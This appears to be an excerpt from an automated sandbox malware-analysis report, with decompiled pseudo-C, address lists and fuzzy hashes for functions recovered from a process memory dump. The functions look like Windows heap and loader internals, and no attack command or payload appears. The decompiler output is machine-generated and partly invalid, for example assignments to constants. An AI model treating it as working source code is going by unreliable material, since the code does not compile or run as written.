							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x46d7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0461A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E045FFFB0(_t193, _t235, 0x46d8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L046077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L046077F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x46d7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x46d7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E046237C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x46d7b9c; // 0x0
									_t214 = L04604620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E046237F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x46d7b10 =  *0x46d7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x46d7b04 =  *0x46d7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L046077F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L046077F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x46d7b08 =  *0x46d7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E046257C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0462F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L046077F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0461A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L046077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E046296C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x045f849b
0x045f849b
0x045f849b
0x045f849b
0x045f849d
0x045f84a2
0x045f84a7
0x045f84b1
0x045f84d8
0x00000000
0x045f84b3
0x045f84c4
0x045f84c9
0x045f84cd
0x045f84cf
0x045f84cf
0x045f84d6
0x045f84e6
0x045f84e9
0x045f84ec
0x045f84ef
0x045f84f2
0x045f84f4
0x045f84fc
0x045f8501
0x045f8506
0x045f8509
0x045f86e0
0x045f86e5
0x045f86e8
0x045f86ed
0x045f86f0
0x045f86f2
0x04649afd
0x04649b02
0x045f84da
0x045f84df
0x045f84df
0x045f86fa
0x045f86fd
0x045f86fe
0x045f8701
0x045f8706
0x045f8709
0x045f870b
0x00000000
0x00000000
0x045f8711
0x045f8725
0x045f8727
0x045f872a
0x045f872c
0x04649af0
0x04649af5
0x045f8732
0x045f8732
0x045f8732
0x045f8735
0x045f8737
0x045f8515
0x045f8515
0x045f8518
0x045f851d
0x045f8523
0x045f8527
0x045f852b
0x045f8537
0x045f8539
0x045f853c
0x045f853e
0x045f868c
0x045f8691
0x045f8699
0x045f869b
0x045f8744
0x045f8748
0x045f86a1
0x045f86a1
0x045f86a1
0x045f86a4
0x045f86a8
0x04649bdf
0x04649bdf
0x045f86ae
0x045f86b0
0x00000000
0x045f86b6
0x00000000
0x04649be9
0x045f86b0
0x045f8544
0x045f854a
0x045f854d
0x045f8551
0x045f876e
0x045f8778
0x045f877b
0x045f8780
0x045f8557
0x045f8557
0x045f855d
0x045f855d
0x045f856b
0x045f856e
0x045f8570
0x045f8573
0x045f8576
0x045f8576
0x045f8579
0x045f857b
0x00000000
0x00000000
0x045f8581
0x045f85a0
0x045f85a2
0x045f85a5
0x045f85a7
0x04649b1b
0x04649b1b
0x045f862e
0x045f862e
0x045f8631
0x045f8631
0x045f8634
0x045f8636
0x045f8669
0x045f8669
0x045f866b
0x04649bbf
0x04649bc4
0x04649bc8
0x04649bce
0x04649bce
0x045f8671
0x045f8671
0x045f8674
0x045f8676
0x04649bae
0x04649bae
0x045f8676
0x045f867c
0x045f867e
0x045f8688
0x045f8688
0x00000000
0x045f867e
0x045f8638
0x045f8638
0x045f863b
0x045f863e
0x045f863f
0x045f8642
0x045f8645
0x045f8648
0x045f864d
0x04649b69
0x04649b6e
0x04649b7b
0x04649b81
0x04649b85
0x04649b89
0x04649ba7
0x04649b8b
0x04649b91
0x04649b9a
0x04649b9f
0x04649b9f
0x045f8788
0x045f878d
0x045f8763
0x045f8763
0x045f8766
0x00000000
0x045f8766
0x04649b70
0x00000000
0x04649b70
0x045f8656
0x045f865a
0x045f865c
0x045f8752
0x045f8756
0x00000000
0x00000000
0x045f875e
0x00000000
0x045f875e
0x045f8662
0x045f8662
0x045f8662
0x045f8666
0x00000000
0x045f8666
0x045f85b7
0x045f85b9
0x045f85bc
0x045f85bf
0x045f85cc
0x045f85d1
0x045f85d4
0x045f85db
0x045f85de
0x045f85e0
0x04649b5f
0x00000000
0x04649b5f
0x045f85e6
0x045f85ea
0x045f86c3
0x045f86c5
0x045f86c8
0x045f86ca
0x04649b16
0x00000000
0x04649b16
0x045f86d6
0x045f85f6
0x045f85f6
0x045f85f9
0x045f8602
0x045f8606
0x045f860a
0x045f860b
0x045f860e
0x045f8611
0x00000000
0x045f8611
0x045f85f3
0x00000000
0x045f85f3
0x045f8619
0x045f861e
0x045f861e
0x045f8621
0x045f8622
0x045f8623
0x045f8625
0x045f862c
0x00000000
0x045f873d
0x00000000
0x045f873d
0x045f8737
0x045f850f
0x045f8512
0x00000000
0x045f8512
0x00000000
0x045f84d6

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa955f9092fb7f674a39a520570915400a9c495bc92a616878cf0cc281b72adf
Instruction ID: 90d15188c5828734396290ef81a2c0cdaa4adcc31ad84956396f2a43f9ef3d6e
Opcode Fuzzy Hash: aa955f9092fb7f674a39a520570915400a9c495bc92a616878cf0cc281b72adf
Instruction Fuzzy Hash: 9CB14AB0E00209DFDB18EFA9C984AAEBBB5FF88308F104529E505AB345E770BD45DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0461513A Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0461513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x46dd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0462D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04602280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04604620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0462F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E045FFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x46db1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0462B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x04615142
0x0461514c
0x04615150
0x04615157
0x04615159
0x0461515e
0x04615165
0x04615169
0x0461516c
0x04615172
0x04615176
0x0461517a
0x0461517a
0x0461517a
0x0461517f
0x04656d8b
0x04656d8e
0x04656d91
0x04656d95
0x04656d98
0x04656d9c
0x04656da0
0x04656da3
0x04656da7
0x04656e26
0x04656e26
0x04656e2a
0x046151f9
0x046151f9
0x046151fe
0x04656e33
0x04656e33
0x04656e39
0x04656e3d
0x04656e46
0x04656e50
0x00000000
0x00000000
0x04656e52
0x04656e53
0x04656e56
0x04656e5d
0x00000000
0x00000000
0x00000000
0x04656e5f
0x04656e67
0x04656e77
0x04656e7f
0x04656e80
0x04656e88
0x04656e90
0x04656e9f
0x04656ea5
0x04656ea9
0x04656eb1
0x04656ebf
0x00000000
0x00000000
0x04656ecf
0x04656ed3
0x00000000
0x00000000
0x04656edb
0x04656ede
0x04656ee1
0x04656ee8
0x04656eeb
0x04656eed
0x04656ef0
0x04656ef4
0x04656ef8
0x04656efc
0x00000000
0x00000000
0x04656f0d
0x04656f11
0x04656f32
0x04656f37
0x04656f3b
0x04656f3e
0x04656f41
0x04656f46
0x00000000
0x00000000
0x04656f4c
0x04656f50
0x04656f50
0x04656f54
0x04656f62
0x04656f65
0x04656f6d
0x04656f7b
0x04656f7b
0x04656f93
0x04656f98
0x04656fa0
0x04656fa6
0x04656fb3
0x04656fb6
0x04656fbf
0x04656fc1
0x04656fd5
0x04656fda
0x04656fda
0x04656fdd
0x04656fe2
0x04656fe7
0x04656feb
0x04656fef
0x04656ff3
0x0461520c
0x0461520c
0x0461520f
0x04615215
0x04615234
0x0461523a
0x0461523a
0x04615244
0x04615245
0x04615246
0x04615251
0x04615251
0x04656f13
0x04656f17
0x04656f17
0x04656f18
0x04656f1b
0x04656f1f
0x04656f23
0x00000000
0x04656f28
0x04615204
0x04615204
0x04615208
0x00000000
0x04615208
0x04615185
0x04615188
0x0461518a
0x0461518e
0x04615195
0x04656db1
0x04656db5
0x04656db9
0x0461519b
0x0461519b
0x0461519e
0x046151a7
0x046151a9
0x046151a9
0x046151b5
0x046151b8
0x046151bb
0x046151be
0x046151c1
0x046151c5
0x046151c9
0x046151cd
0x046151cd
0x046151d8
0x046151dc
0x046151e0
0x04656dcc
0x04656dd0
0x04656dd5
0x04656ddd
0x04656de1
0x04656de1
0x04656de5
0x04656deb
0x04656df1
0x04656df7
0x04656dfd
0x04656e01
0x04656e05
0x04656e09
0x04656e0d
0x04656e11
0x04656e11
0x046151eb
0x04656e1a
0x04656e1f
0x04656e21
0x04656e23
0x00000000
0x046151f1
0x046151f1
0x00000000
0x046151f1

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d37803e711035b81204f8e624dd5cd668378cd7975c5fdbf029e609b30f96d89
Instruction ID: 08626115460acb7dc8764c562711ad7f37c266aff7f4f3538a5fc03e0904062e
Opcode Fuzzy Hash: d37803e711035b81204f8e624dd5cd668378cd7975c5fdbf029e609b30f96d89
Instruction Fuzzy Hash: 5CC135756093809FD354CF28C580A5AFBF1BF88304F184A6EF8998B362E770E845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 046103E2 Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E046103E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x46dd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04610548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0462B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E045FB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x46d7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E04607D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E04607D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04667016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04629830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E046669A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x46d7c04 != 0) {
						_t118 = _v12;
						_t120 = E0466A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x46d7bd8;
						if( *0x46d7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E046295D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E046299A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04663540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E045EB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0462AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x46d8474 - 3;
										if( *0x46d8474 != 3) {
											 *0x46d79dc =  *0x46d79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E04607D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E04607D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04667016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x46d8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x46d7b00; // 0x0
							asm("ror esi, cl");
							 *0x46db1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E046295D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E045F7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x046103f1
0x046103f7
0x046103f9
0x046103fb
0x046103fd
0x04610400
0x0461040a
0x04654c7a
0x04610537
0x04610547
0x04610410
0x04610410
0x04610414
0x04610417
0x0461041a
0x04610421
0x04610424
0x0461042b
0x0461043b
0x0461043e
0x0461043f
0x0461043f
0x04610446
0x04610449
0x0461044c
0x0461044f
0x04610459
0x04654c8d
0x0461045f
0x0461045f
0x0461045f
0x04610467
0x04654c97
0x04654c9d
0x04654ca4
0x04654caa
0x04654caf
0x04654cb1
0x04654cc3
0x04654cb3
0x04654cbc
0x04654cbc
0x04654cc8
0x04654ccb
0x04654cd7
0x04654cda
0x04654cdf
0x04654cdf
0x04654ccb
0x04654ca4
0x0461046d
0x0461046f
0x0461046f
0x04610471
0x04610476
0x0461047a
0x0461047b
0x04610483
0x04610489
0x0461048d
0x00000000
0x00000000
0x04654ce9
0x04654cef
0x04654d22
0x04654d22
0x00000000
0x04654d22
0x04654cf1
0x04654cf7
0x00000000
0x00000000
0x04654cf9
0x04654cff
0x00000000
0x00000000
0x04654d05
0x04654d07
0x00000000
0x00000000
0x04654d0d
0x04654d0f
